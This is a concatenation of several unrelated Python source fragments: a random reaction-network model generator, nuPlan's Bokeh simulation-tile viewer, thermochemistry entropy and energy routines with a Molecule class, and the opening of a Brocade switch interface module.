str(const) + '\n' break if kinetics[1] == 'lognormal': const = lognorm.rvs(scale=kinetics[3][kinetics[2].index('km')][0], s=kinetics[3][kinetics[2].index('km')][1]) ant_str += each + ' = ' + str(const) + '\n' if kma: ant_str += '\n' kms = list(kms) kms.sort() for each in kms: if kinetics[1] == 'trivial': ant_str += each + ' = 1\n' if kinetics[1] == 'uniform': const = uniform.rvs(loc=kinetics[3][kinetics[2].index('km')][0], scale=kinetics[3][kinetics[2].index('km')][1] - kinetics[3][kinetics[2].index('km')][0]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'loguniform': const = loguniform.rvs(kinetics[3][kinetics[2].index('km')][0], kinetics[3][kinetics[2].index('km')][1]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'normal': while True: const = norm.rvs(loc=kinetics[3][kinetics[2].index('km')][0], scale=kinetics[3][kinetics[2].index('km')][1]) if const >= 0: ant_str += each + ' = ' + str(const) + '\n' break if kinetics[1] == 'lognormal': const = lognorm.rvs(scale=kinetics[3][kinetics[2].index('km')][0], s=kinetics[3][kinetics[2].index('km')][1]) ant_str += each + ' = ' + str(const) + '\n' if kms: ant_str += '\n' m = list(m) m.sort() for each in m: if kinetics[1] == 'trivial': ant_str += each + ' = 1\n' if kinetics[1] == 'uniform': const = uniform.rvs(loc=kinetics[3][kinetics[2].index('m')][0], scale=kinetics[3][kinetics[2].index('m')][1] - kinetics[3][kinetics[2].index('m')][0]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'loguniform': const = loguniform.rvs(kinetics[3][kinetics[2].index('m')][0], kinetics[3][kinetics[2].index('m')][1]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'normal': while True: const = norm.rvs(loc=kinetics[3][kinetics[2].index('m')][0], scale=kinetics[3][kinetics[2].index('m')][1]) if const >= 0: ant_str += each + ' = ' + str(const) + '\n' break if kinetics[1] == 'lognormal': const = lognorm.rvs(scale=kinetics[3][kinetics[2].index('m')][0], 
s=kinetics[3][kinetics[2].index('m')][1]) ant_str += each + ' = ' + str(const) + '\n' if m: ant_str += '\n' ma = list(ma) ma.sort() for each in ma: if kinetics[1] == 'trivial': ant_str += each + ' = 1\n' if kinetics[1] == 'uniform': const = uniform.rvs(loc=kinetics[3][kinetics[2].index('m')][0], scale=kinetics[3][kinetics[2].index('m')][1] - kinetics[3][kinetics[2].index('m')][0]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'loguniform': const = loguniform.rvs(kinetics[3][kinetics[2].index('m')][0], kinetics[3][kinetics[2].index('m')][1]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'normal': while True: const = norm.rvs(loc=kinetics[3][kinetics[2].index('m')][0], scale=kinetics[3][kinetics[2].index('m')][1]) if const >= 0: ant_str += each + ' = ' + str(const) + '\n' break if kinetics[1] == 'lognormal': const = lognorm.rvs(scale=kinetics[3][kinetics[2].index('m')][0], s=kinetics[3][kinetics[2].index('m')][1]) ant_str += each + ' = ' + str(const) + '\n' if ma: ant_str += '\n' ms = list(ms) ms.sort() for each in ms: if kinetics[1] == 'trivial': ant_str += each + ' = 1\n' if kinetics[1] == 'uniform': const = uniform.rvs(loc=kinetics[3][kinetics[2].index('m')][0], scale=kinetics[3][kinetics[2].index('m')][1] - kinetics[3][kinetics[2].index('m')][0]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'loguniform': const = loguniform.rvs(kinetics[3][kinetics[2].index('m')][0], kinetics[3][kinetics[2].index('m')][1]) ant_str += each + ' = ' + str(const) + '\n' if kinetics[1] == 'normal': while True: const = norm.rvs(loc=kinetics[3][kinetics[2].index('m')][0], scale=kinetics[3][kinetics[2].index('m')][1]) if const >= 0: ant_str += each + ' = ' + str(const) + '\n' break if kinetics[1] == 'lognormal': const = lognorm.rvs(scale=kinetics[3][kinetics[2].index('m')][0], s=kinetics[3][kinetics[2].index('m')][1]) ant_str += each + ' = ' + str(const) + '\n' if ms: ant_str += '\n' if 'deg' in kinetics[2]: for _ in floating_ids: if 
kinetics[1] == 'trivial': ant_str += 'k' + str(parameter_index) + ' = 1\n' if kinetics[1] == 'uniform': const = uniform.rvs(loc=kinetics[3][kinetics[2].index('deg')][0], scale=kinetics[3][kinetics[2].index('deg')][1] - kinetics[3][kinetics[2].index('deg')][0]) ant_str += 'k' + str(parameter_index) + ' = ' + str(const) + '\n' if kinetics[1] == 'loguniform': const = loguniform.rvs(kinetics[3][kinetics[2].index('deg')][0], kinetics[3][kinetics[2].index('deg')][1]) ant_str += 'k' + str(parameter_index) + ' = ' + str(const) + '\n' if kinetics[1] == 'normal': while True: const = norm.rvs(loc=kinetics[3][kinetics[2].index('deg')][0], scale=kinetics[3][kinetics[2].index('deg')][1]) if const >= 0: ant_str += 'k' + str(parameter_index) + ' = ' + str(const) + '\n' break if kinetics[1] == 'lognormal': const = lognorm.rvs(scale=kinetics[3][kinetics[2].index('deg')][0], s=kinetics[3][kinetics[2].index('deg')][1]) ant_str += 'k' + str(parameter_index) + ' = ' + str(const) + '\n' parameter_index += 1 ant_str += '\n' def get_i_cvalue(ic_ind): ic = None if ic_params == 'trivial': ic = 1 if isinstance(ic_params, list) and ic_params[0] == 'uniform': ic = uniform.rvs(loc=ic_params[1], scale=ic_params[2]-ic_params[1]) if isinstance(ic_params, list) and ic_params[0] == 'loguniform': ic = loguniform.rvs(ic_params[1], ic_params[2]) if isinstance(ic_params, list) and ic_params[0] == 'normal': ic = norm.rvs(loc=ic_params[1], scale=ic_params[2]) if isinstance(ic_params, list) and ic_params[0] == 'lognormal': ic = lognorm.rvs(scale=ic_params[1], s=ic_params[2]) if isinstance(ic_params, list) and ic_params[0] == 'list': ic = ic_params[1][ic_ind] if ic_params is None: ic = uniform.rvs(loc=0, scale=10) return ic for index, b in enumerate(boundary_ids): i_cvalue = get_i_cvalue(b, ) ant_str += 'S' + str(b) + ' = ' + str(i_cvalue) + '\n' ant_str += '\n' for index, b in enumerate(floating_ids): i_cvalue = get_i_cvalue(b) ant_str += 'S' + str(b) + ' = ' + str(i_cvalue) + '\n' if add_enzyme: ant_str += 
'\n' for index, r in enumerate(reaction_list_copy): ant_str += 'E' + str(index) + ' = 1\n' return ant_str def generate_simple_linear(n_species): reaction_list = [] edge_list = [] node_set = set() last_products = None while True: if not node_set: reactant = 0 else: reactant = max(last_products) product = reactant + 1 last_products = {product} reaction_list.append([0, [reactant], [product], [], [], []]) edge_list.append([reactant, product]) node_set.add(reactant) node_set.add(product) if len(node_set) == n_species: break reaction_list.insert(0, n_species)
<filename>nuplan/planning/nuboard/base/simulation_tile.py import json import logging import lzma import pathlib import pickle from functools import partial from pathlib import Path from typing import Any, Dict, List, Optional import msgpack from bokeh.document.document import Document from bokeh.layouts import gridplot from bokeh.models import ColumnDataSource, Glyph, HoverTool, Line, MultiLine, MultiPolygons, Slider from bokeh.plotting import figure from nuplan.common.actor_state.state_representation import Point2D, StateSE2 from nuplan.common.actor_state.transform_state import get_front_left_corner, get_front_right_corner, \ get_rear_left_corner, get_rear_right_corner, translate_longitudinally from nuplan.common.actor_state.vehicle_parameters import BoxParameters, VehicleParameters from nuplan.common.maps.abstract_map import AbstractMap from nuplan.common.maps.abstract_map_objects import StopLine from nuplan.common.maps.maps_datatypes import SemanticMapLayer, StopLineType from nuplan.planning.nuboard.base.data_class import BokehAgentStates, SimulationScenarioKey from nuplan.planning.nuboard.style import simulation_map_layer_color, simulation_tile_style from nuplan.planning.scenario_builder.abstract_scenario_builder import AbstractScenarioBuilder logger = logging.getLogger(__name__) def extract_source_from_states(states: List[Dict[str, Any]]) -> ColumnDataSource: """ Helper function to get the xy coordinates into ColumnDataSource format from a list of states. :param states: List of states (containing the pose) :return: A ColumnDataSource object containing the xy coordinates. """ x_coords = [] y_coords = [] for state in states: x_coords.append(state['pose'][0]) y_coords.append(state['pose'][1]) source = ColumnDataSource(dict( xs=x_coords, ys=y_coords) ) return source def _extract_serialization_type(first_file: pathlib.Path) -> str: """ Deduce the serialization type :param first_file: serialized file :return: one from ["msgpack", "pickle", "json"]. 
""" msg_pack = first_file.suffixes == ['.msgpack', '.xz'] msg_pickle = first_file.suffixes == ['.pkl', '.xz'] msg_json = first_file.suffix == ".json" number_of_available_types = int(msg_pack) + int(msg_json) + int(msg_pickle) # We can handle only conclusive serialization type if number_of_available_types != 1: raise RuntimeError(f"Inconclusive file type: {first_file}!") if msg_pickle: return "pickle" elif msg_json: return "json" elif msg_pack: return "msgpack" else: raise RuntimeError("Unknown condition!") def _load_data(file_name: pathlib.Path, serialization_type: str) -> Any: """ Load data from file_name :param file_name: the name of a file which we want to deserialize :param serialization_type: type of serialization of the file :return: deserialized type """ if serialization_type == "json": with open(str(file_name), 'r') as f: # type: ignore return json.load(f) elif serialization_type == "msgpack": with lzma.open(str(file_name), "rb") as f: return msgpack.unpackb(f.read()) elif serialization_type == "pickle": with lzma.open(str(file_name), "rb") as f: return pickle.load(f) else: raise ValueError(f"Unknown serialization type: {serialization_type}!") class SimulationTile: def __init__(self, doc: Document, vehicle_parameters: VehicleParameters, scenario_builder: AbstractScenarioBuilder, period_milliseconds: int = 5000, radius: float = 150.0): """ Scenario simulation tile. :param doc: Bokeh HTML document. :param vehicle_parameters: Ego pose parameters. :param scenario_builder: Scenario builder instance. :param period_milliseconds: Milli seconds to update the tile. :param radius: Map radius. 
""" self._doc = doc self._vehicle_parameters = vehicle_parameters self._scenario_builder = scenario_builder self._period_milliseconds = period_milliseconds self._radius = radius self._selected_scenario_keys: List[SimulationScenarioKey] = [] self._maps: Dict[str, AbstractMap] = {} def _map_api(self, map_name: str) -> AbstractMap: if map_name not in self._maps: self._maps[map_name] = self._scenario_builder.get_map_api(map_name) return self._maps[map_name] def _init_simulations(self) -> None: """ Initialization of the visualization of simulation panel. """ self._figures: List[figure] = [] self._sliders: List[Slider] = [] self._scenes: List[Dict[Path, Any]] = [] self._ego_state_plots: List[Optional[Glyph]] = [] self._ego_state_trajectory_plots: List[Optional[Glyph]] = [] self._agent_state_plots: List[Optional[Glyph]] = [] self._agent_state_heading_plots: List[Optional[Glyph]] = [] self._agent_state_trajectory_plots: List[Optional[Glyph]] = [] self._ego_state_data_sources: List[List[ColumnDataSource]] = [] self._ego_state_trajectory_data_sources: List[List[ColumnDataSource]] = [] self._agent_data_sources: List[List[ColumnDataSource]] = [] self._agent_state_trajectory_data_sources: List[List[ColumnDataSource]] = [] for figure_index in range(len(self._selected_scenario_keys)): self._scenes.append({}) self._ego_state_plots.append(None) self._ego_state_trajectory_plots.append(None) self._agent_state_plots.append(None) self._agent_state_heading_plots.append(None) self._agent_state_trajectory_plots.append(None) self._ego_state_data_sources.append([]) self._ego_state_trajectory_data_sources.append([]) self._agent_data_sources.append([]) self._agent_state_trajectory_data_sources.append([]) simulation_figure = figure(x_range=(-self._radius, self._radius), y_range=(-self._radius, self._radius), plot_width=simulation_tile_style['figure_sizes'][0], plot_height=simulation_tile_style['figure_sizes'][1], title=f"{self._selected_scenario_keys[figure_index].planner_name}", tools=["pan", 
"wheel_zoom", "save", "reset"], match_aspect=True, active_scroll="wheel_zoom", margin=simulation_tile_style['figure_margins'], background_fill_color=simulation_tile_style['background_color'], ) simulation_figure.axis.visible = False simulation_figure.xgrid.visible = False simulation_figure.ygrid.visible = False simulation_figure.title.text_font_size = simulation_tile_style['figure_title_text_font_size'] simulation_figure.rect(fill_color=simulation_tile_style['planner_color'], legend_label="Ego") simulation_figure.rect(fill_color=simulation_tile_style['agent_color'], legend_label="Agents") simulation_figure.line(line_color=simulation_tile_style['planner_color'], legend_label="Planned trajectory") simulation_figure.line(line_color=simulation_tile_style['expert_color'], legend_label="Expert trajectory") simulation_figure.legend.background_fill_color = 'lightgray' simulation_figure.legend.label_text_font_style = 'bold' simulation_figure.legend.glyph_height = 25 simulation_figure.legend.glyph_width = 25 slider = Slider(start=0, end=1, value=0, step=1, title="Frame", margin=simulation_tile_style['slider_margins']) slider.on_change("value", partial(self._slider_on_change, figure_index=figure_index)) self._figures.append(simulation_figure) self._sliders.append(slider) @property def figures(self) -> List[figure]: """ Access bokeh figures. :return A list of bokeh figures. """ return self._figures @property def sliders(self) -> List[Slider]: """ Access bokeh sliders. :return A list of bokeh sliders. """ return self._sliders def _update_data_sources(self, scene: Dict[str, Any], figure_index: int, file_index: int) -> None: """ Update data sources once there are new data sources. :param scene: A dict of scene data. :param figure_index: A figure index. :param file_index: A file index. 
""" if file_index != 0: self._sliders[figure_index].end = file_index self._update_ego_state(ego_state=scene['ego'], figure_index=figure_index) self._update_ego_state_trajectory(trajectory=scene['trajectories']['ego_predicted_trajectory'], figure_index=figure_index) self._update_agents(observations=scene['world'], figure_index=figure_index) def _slider_on_change(self, attr: str, old: int, new: int, figure_index: int) -> None: """ Helper function when a slider changes. :param attr: Attribute name. :param old: Old value. :param new: New value. :param figure_index: Figure index. """ if new != len(self._scenes[figure_index]): self._render_plots(frame_index=new, figure_index=figure_index) def _read_files(self) -> None: """ Read all simulation files to memory. """ for figure_index, simulation_scenario_key in enumerate(self._selected_scenario_keys): sorted_files = sorted(simulation_scenario_key.files, reverse=False) if len(sorted_files) == 0: raise RuntimeError("No files were found!") # Deduce the type of files first_file = sorted_files[0] serialization = _extract_serialization_type(first_file) if len(sorted_files) > 1: # Load scenes from all the available files for file_index, file in enumerate(sorted_files): self._scenes[figure_index][file] = _load_data(file, serialization) self._update_data_sources(self._scenes[figure_index][file], figure_index, file_index) else: # Load all scenes in one go file = first_file scenes = _load_data(file, serialization) scenes = scenes if isinstance(scenes, list) else [scenes] self._load_scenes(figure_index, scenes) def _load_scenes(self, figure_index: int, scenes: List[Dict[str, Any]]) -> None: """ Load all scenes corresponding to figure_index :param figure_index: index of the loading figure :param scenes: all scenes to be loaded """ for file_index, scene in enumerate(scenes): timestamp_us = pathlib.Path(str(scene["ego"]["timestamp_us"])) self._scenes[figure_index][timestamp_us] = scene 
self._update_data_sources(self._scenes[figure_index][timestamp_us], figure_index, file_index) @staticmethod def _render_simulation_layouts(figures: List[figure], sliders: List[Slider]) -> List[Any]: """ Render simulation layouts. :param figures: A list of figures. :param sliders: A list of sliders. :return: A list of columns or rows. """ grid_layouts = [] for figure_plot, slider in zip(figures, sliders): grid_layouts.append(gridplot([[figure_plot], [slider]])) return grid_layouts def render_simulation_tiles(self, selected_scenario_keys: List[SimulationScenarioKey]) -> List[Any]: """ Render simulation tiles. :param selected_scenario_keys: A list of selected scenario keys. :return A list of bokeh layouts. """ self._selected_scenario_keys = selected_scenario_keys self._init_simulations() self._read_files() if len(self._scenes) > 0: self._render_scenario() layouts = self._render_simulation_layouts(self._figures, self._sliders) return layouts def _render_scenario(self) -> None: """ Render scenario. """ if len(self._scenes) == 0: return for figure_index, scene in enumerate(self._scenes): files = list(scene.keys()) if len(files) == 0: continue # Load the first file only. scene_states = scene[files[0]] self._render_map(figure_index=figure_index, scene=scene_states) expert_ego_trajectory = None if 'ego_expert_trajectory' in scene_states['trajectories']: expert_ego_trajectory = scene_states['trajectories']['ego_expert_trajectory'] if expert_ego_trajectory is not None: self._render_expert_trajectory(expert_ego_trajectory=expert_ego_trajectory, figure_index=figure_index) self._render_plots(frame_index=0, figure_index=figure_index) def _render_map(self, figure_index: int, scene: Dict[str, Any]) -> None: """ Render a map. :param figure_index: Index of the figure. :param scene: A dictionary of scene info. 
""" map_name = scene['map_name'] map_api = self._map_api(map_name) layer_names = [SemanticMapLayer.LANE_CONNECTOR, SemanticMapLayer.LANE, SemanticMapLayer.CROSSWALK, SemanticMapLayer.INTERSECTION, SemanticMapLayer.STOP_LINE] ego_pose = scene['ego']['pose'] center = Point2D(ego_pose[0], ego_pose[1]) nearest_vector_map = map_api.get_proximal_map_objects(center, self._radius, layer_names) # Filter out stop polygons in turn stop if SemanticMapLayer.STOP_LINE in nearest_vector_map: stop_polygons: List[StopLine] = nearest_vector_map[SemanticMapLayer.STOP_LINE] nearest_vector_map[SemanticMapLayer.STOP_LINE] = [stop_polygon for stop_polygon in stop_polygons if stop_polygon.stop_line_type == StopLineType.TURN_STOP] # Draw polygons polygon_layer_names = \ [(SemanticMapLayer.LANE, simulation_map_layer_color[SemanticMapLayer.LANE]), (SemanticMapLayer.INTERSECTION, simulation_map_layer_color[SemanticMapLayer.INTERSECTION]), (SemanticMapLayer.STOP_LINE, simulation_map_layer_color[SemanticMapLayer.STOP_LINE]), (SemanticMapLayer.CROSSWALK, simulation_map_layer_color[SemanticMapLayer.CROSSWALK])] polygon_xs = [] polygon_ys = [] fill_colors = [] fill_color_alphas = [] line_colors = [] for layer_name, color in polygon_layer_names: layer = nearest_vector_map[layer_name] for map_obj in layer: xs = [] ys = [] coords = map_obj.polygon.exterior.coords for x, y in coords: xs.append(x) ys.append(y) fill_colors.append(color['fill_color']) fill_color_alphas.append(color['fill_color_alpha']) line_colors.append(color['line_color']) polygon_xs.append([[xs]]) polygon_ys.append([[ys]]) polygon_source = ColumnDataSource(dict( xs=polygon_xs, ys=polygon_ys, fill_colors=fill_colors, fill_color_alphas=fill_color_alphas, line_colors=line_colors ) ) polygon_glyph = MultiPolygons(xs="xs", ys="ys", fill_color="fill_colors", fill_alpha='fill_color_alphas', line_color="line_colors") # Draw lines line_layer_names = [(SemanticMapLayer.LANE, simulation_map_layer_color[SemanticMapLayer.BASELINE_PATHS]), 
(SemanticMapLayer.LANE_CONNECTOR, simulation_map_layer_color[SemanticMapLayer.LANE_CONNECTOR])] line_xs = [] line_ys = [] line_colors = [] line_color_alphas = [] for layer_name, color in line_layer_names: layer = nearest_vector_map[layer_name] for map_obj in layer: xs = [] ys = [] path = map_obj.baseline_path().discrete_path() for pose in path: xs.append(pose.x) ys.append(pose.y) line_colors.append(color['line_color']) line_color_alphas.append(color['line_color_alpha']) line_xs.append(xs) line_ys.append(ys) line_source = ColumnDataSource(dict( xs=line_xs, ys=line_ys, line_colors=line_colors, line_color_alphas=line_color_alphas) ) line_glyph = MultiLine(xs="xs", ys="ys", line_color="line_colors", line_alpha="line_color_alphas", line_width=0.5, line_dash='dashed') figure = self._figures[figure_index] figure.add_glyph(polygon_source, polygon_glyph) figure.add_glyph(line_source, line_glyph) def _render_mission_goal(self, mission_goal_state: Dict[str, Any], figure_index: int) -> None: """ Render the mission goal. :param mission_goal_state: Mission goal state. :param figure_index: Figure index. """ pose = mission_goal_state['pose'] source = ColumnDataSource(dict( xs=[pose[0]], ys=[pose[1]], heading=[pose[2]] )) self._figures[figure_index].circle_cross( x="xs", y="ys", size=simulation_tile_style['mission_goal_size'], fill_alpha=simulation_tile_style['mission_goal_alpha'], angle="heading", color=simulation_tile_style['mission_goal_color'], line_width=simulation_tile_style['mission_goal_line_width'], source=source ) def _render_expert_trajectory(self, expert_ego_trajectory: Dict[str, Any], figure_index: int) -> None: """ Render expert trajectory. :param expert_ego_trajectory: A list of trajectory states. :param figure_index: Figure index. 
""" source = extract_source_from_states(expert_ego_trajectory["states"]) glyph = Line(x="xs", y="ys", line_color=simulation_tile_style['expert_color'], line_width=simulation_tile_style['expert_trajectory_line_width']) self._figures[figure_index].add_glyph(source, glyph) def _update_ego_state(self, ego_state: Dict[str, Any], figure_index: int) -> None: """ Update ego state. :param ego_state: A dict of ego states. :param figure_index: Figure index. """ pose = ego_state['pose'] ego_state_se: StateSE2 = StateSE2( x=pose[0], y=pose[1], heading=pose[2] ) ego_corners = [get_front_left_corner(ego_state_se, self._vehicle_parameters.half_length, self._vehicle_parameters.half_width),
* Constants.c_in_cm * Constants.h / (Constants.k_b * temp) s_v = Constants.r * ((x / (np.exp(x) - 1.0)) - np.log(1.0 - np.exp(-x))) s_r = Constants.r * (0.5 + np.log(np.sqrt((8.0 * np.pi**3 * mu_prime * Constants.k_b * temp) / (Constants.h**2) ))) w = 1.0 / (1.0 + (omega_0 / freq)**alpha) s += w * s_v + (1.0 - w) * s_r return s def _q_t_ew(molecule, temp): """ Translational parition function using an exponential well approximation :param molecule: :param temp: :param a: :param k: :return: """ mass = molecule.mass / Constants.amu_to_kg * Constants.amu_to_au a = molecule.ew_a_inv_ang * Constants.inverse_ang_inverse_au k = molecule.ew_k_kcal * Constants.kcal_mol_to_au beta = 1.0 / (Constants.kb_au * temp) def exp_integrand(r, beta, a, b): return r ** 2 * np.exp(- beta * a * np.exp(b * r)) cap_lambda = ((2.0 * mass * np.pi) / (beta * Constants.h_au**2))**1.5 integral = integrate.quad(exp_integrand, 0.0, 10.0, args=(beta, k, a))[0] return 4.0 * np.pi * np.exp(beta * k) * cap_lambda * integral def calc_entropy_ew(molecule, temp): """ Expoential well entropy :param molecule: :param temp: :param a: :param k: :return: """ mass = molecule.mass / Constants.amu_to_kg * Constants.amu_to_au a = molecule.ew_a_inv_ang * Constants.inverse_ang_inverse_au k = molecule.ew_k_kcal * Constants.kcal_mol_to_au q_t = _q_t_ew(molecule, temp) beta = 1.0 / (Constants.kb_au * temp) cap_lambda = ((2.0 * mass * np.pi) / (beta * Constants.h_au ** 2)) ** 1.5 def integrand(r, beta, a, b): return r ** 2 * np.exp(-beta * a * (np.exp(b * r) - 1.0) + b * r) integral = integrate.quad(integrand, 0.0, 10.0, args=(beta, k, a))[0] term_4 = 4.0 * np.pi * (k * beta * cap_lambda / q_t) * integral return Constants.r * (1.5 - k * beta + np.log(q_t) + term_4) def calc_entropy(molecule, method='grimme', temp=298.15, ss='1M', shift=100, w0=100, alpha=4): """ Calculate the entropy :param molecule: (otherm.Molecule) :return: (float) S in J K-1 mol-1 """ # Translational entropy component s_trans = 
calc_s_trans_pib(molecule, ss=ss, temp=temp) if molecule.n_atoms == 1: # A molecule with only one atom has no rotational/vibrational DOF return s_trans # Rotational entropy component s_rot = calc_s_rot_rr(molecule, temp=temp) # Vibrational entropy component if method.lower() in ('igm', 'ew_rrho'): s_vib = calc_igm_s_vib(molecule, temp) elif method.lower() == 'truhlar': s_vib = calc_truhlar_s_vib(molecule, temp, shift_freq=shift) elif method.lower() in ('grimme', 'no_s_trans', 'ew'): s_vib = calc_grimme_s_vib(molecule, temp, omega_0=w0, alpha=alpha) else: raise NotImplementedError(f'Unsupported method {method}') if method.lower() == 'no_s_trans': return s_rot + s_vib if 'ew' in method.lower(): s_trans = calc_entropy_ew(molecule, temp) return s_trans + s_rot + s_vib return s_trans + s_rot + s_vib def calc_zpe(molecule): """ Calculate the zero point energy of a molecule, contributed to by the real (positive) frequencies :param molecule: (otherm.Molecule) :return: (float) E_ZPE """ zpe = 0.0 for freq in molecule.real_vib_freqs(): zpe += 0.5 * Constants.h * Constants.n_a * Constants.c_in_cm * freq return zpe def calc_internal_vib_energy(molecule, temp): """ Calculate the internal energy from vibrational motion within the IGM :param molecule: (otherm.Molecule) :param temp: (float) :return: (float) U_vib """ e_vib = 0.0 # Final 6 vibrational frequencies are translational/rotational for freq in molecule.real_vib_freqs(): x = freq * Constants.c_in_cm * Constants.h / Constants.k_b e_vib += Constants.r * x * (1.0 / (np.exp(x/temp) - 1.0)) return e_vib def calc_internal_energy(molecule, temp): """ Calculate the internal energy of a molecule :param molecule: (otherm.Molecule) :param temp: (float) Temperature in K :return: (float) U """ zpe = calc_zpe(molecule) e_trns = 1.5 * Constants.r * temp if molecule.is_linear(): # Linear molecules only have two rotational degrees of freedom -> RT e_rot = Constants.r * temp else: # From equipartition with 3 DOF -> 3/2 RT contribution to 
the energy e_rot = 1.5 * Constants.r * temp e_vib = calc_internal_vib_energy(molecule, temp=temp) return molecule.e + zpe + e_trns + e_rot + e_vib class Molecule: def shift_to_com(self): """Shift a molecules xyzs to the center of mass""" shifted_xyzs = [] for xyz_line in self.xyzs: pos = np.array(xyz_line[1:]) - self.com shifted_xyzs.append(xyz_line[:1] + pos.tolist()) self.xyzs = shifted_xyzs self.com = self.calculate_com() return None def real_vib_freqs(self): """Return the real (positive) vibrational frequencies""" # Vibrational frequencies are all but the 6 smallest (rotational + # translational) and also remove the largest imaginary frequency if # this species is a transtion state excluded_n = 7 if self.is_ts else 6 # Frequencies are sorted high -> low(negative) if self.real_freqs: return [np.abs(freq) for freq in self.freqs[:-excluded_n]] else: return [freq for freq in self.freqs[:-excluded_n] if freq > 0] def calculate_mass(self): """Calculate the molecular mass of this molecule in kg""" atomic_symbols = [xyz[0] for xyz in self.xyzs] masses_amu = [Constants.atomic_masses[elm] for elm in atomic_symbols] return Constants.amu_to_kg * sum(masses_amu) def calculate_com(self): """ Calculate the center of mass (COM :return: (np.ndarray) COM vector """ total_mass = self.mass / Constants.amu_to_kg com_vec = np.zeros(3) # Blank 3D vector for COM vector for xyz_line in self.xyzs: r_vec = np.array(xyz_line[1:]) # Vector for that atom mass = Constants.atomic_masses[xyz_line[0]] com_vec += (1.0 / total_mass) * mass * r_vec return com_vec def pcoords(self): """ Return a tensor where the first dimension is the size of the number of unique atom types in a molecule, the second, the atoms of that type and the third the number of dimensions in the coordinate space (3) :return: (np.ndarray) shape (n, m, 3) """ atom_symbols = list(set(xyz[0] for xyz in self.xyzs)) n_symbols = len(atom_symbols) pcoords = np.zeros(shape=(n_symbols, self.n_atoms, 3)) for i in range(n_symbols): for j 
in range(self.n_atoms): # Atom symbol needs to match the leading dimension if self.xyzs[j][0] != atom_symbols[i]: continue for k in range(3): # k + 1 as the first element is the atomic symbol pcoords[i, j, k] = self.xyzs[j][k+1] return pcoords def coords(self): """Return a numpy array shape (n_atoms, 3) of (x,y,z) coordinates""" return np.array([np.array(line[1:4]) for line in self.xyzs]) def is_linear(self, cos_angle_tol=0.05): """ Determine if a molecule is linear :param cos_angle_tol: :return: """ coords = self.coords() if len(coords) == 2: return True if len(coords) > 2: vec_atom0_atom1 = normalised_vector(coords[0], coords[1]) is_atom_colinear = [False for _ in range(2, len(coords))] for i in range(2, len(coords)): vec_atom0_atomi = normalised_vector(coords[0], coords[i]) if 1.0 - cos_angle_tol < np.abs( np.dot(vec_atom0_atom1, vec_atom0_atomi)) < 1.0: is_atom_colinear[i - 2] = True if all(is_atom_colinear): return True return False def calculate_thermochemistry(self, temp=298.15, ss='1M', method='grimme', shift=100, w0=100, alpha=4, calc_sym=True, symm_n=None): """ Calculate thermochemical components and the energies U, H, S, G ----------------------------------------------------------------------- :param temp: (float) Temperature in K :param ss: (str) standard state e.g. 1M or 1atm :param method: (str) Method to calculate the entropy :param shift: (float) Shift frequency used in the Truhlar method of calculating vibrational entropy. 
All harmonic freqencies below this value will be shifted to this value :param w0: (float) ω0 parameter in the Grimme vibrational entropy method :param alpha: (float) α parameter the Grimme vibrational entropy method :param calc_sym: (bool) Force the calculation of symmetry :param symm_n: (int) Override the calculated symmetry number """ # If the calculation of rotational symmetry number σR is requested or # there aren't too many atoms if calc_sym or self.n_atoms < 50: self.sigma_r = calc_symmetry_number(self) # Allow overwriting σR if symm_n: self.sigma_r = symm_n self.s_rot = calc_s_rot_rr(self, temp=temp) self.s = calc_entropy(self, method, temp, ss, shift, w0, alpha) self.u = calc_internal_energy(self, temp) self.h = self.u + Constants.r * temp self.g = self.h - temp * self.s self.g_cont = self.g - self.e return None def __init__(self, filename, is_ts=False, real_freqs=True, k_kcal=0.6183, a_inv_ang=3.10788): """ Molecule initialised from an ORCA output file :param filename: (str) :param is_ts: (bool) Is this species a TS? if so then exclude """ # Is this molecule a transition state, and so should have one imaginary # (negative frequency) self.is_ts = is_ts # Should all non-TS frequencies be made real (positive) self.real_freqs = real_freqs # Harmonic vibrational frequencies in cm-1 self.freqs = extract_frequencies(filename) # Atom positions [[atom, x, y, z], ...] x/y/z in Å self.xyzs = extract_xyzs(filename) self.n_atoms = len(self.xyzs) # Mass in kg self.mass = self.calculate_mass() # Matrix of I values in kg m^2 self.moments_of_inertia = calc_moments_of_inertia(self.xyzs) # Centre of mass np.array shape (3,) x/y/z in Å self.com = self.calculate_com() self.shift_to_com() # Rotational symmetry number self.sigma_r = 1 #
<reponame>bdeetz/pynos<gh_stars>10-100 """ Copyright 2015 Brocade Communications Systems, Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from pynos.versions.ver_7.ver_7_0_0.yang.brocade_interface \ import brocade_interface as brcd_intf from pynos.versions.ver_7.ver_7_0_0.yang.brocade_rbridge \ import brocade_rbridge as brcd_rbridge import pynos.utilities from pynos.versions.base.interface import Interface as InterfaceBase from pynos.versions.ver_7.ver_7_0_0.yang.brocade_mac_address_table \ import brocade_mac_address_table from pynos.exceptions import InvalidVlanId from ipaddress import ip_interface import xml.etree.ElementTree as ET class Interface(InterfaceBase): """ The Interface class holds all the actions assocaiated with the Interfaces of a NOS device. Attributes: None """ def __init__(self, callback): super(Interface, self).__init__(callback) self._interface = brcd_intf(callback=pynos.utilities.return_xml) self._rbridge = brcd_rbridge(callback=pynos.utilities.return_xml) self._mac_address_table = brocade_mac_address_table( callback=pynos.utilities.return_xml ) def ip_unnumbered(self, **kwargs): """Configure an unnumbered interface. Args: int_type (str): Type of interface. (gigabitethernet, tengigabitethernet etc). name (str): Name of interface id. (For interface: 1/0/5, 1/0/10 etc). delete (bool): True is the IP address is added and False if its to be deleted (True, False). Default value will be False if not specified. donor_type (str): Interface type of the donor interface. 
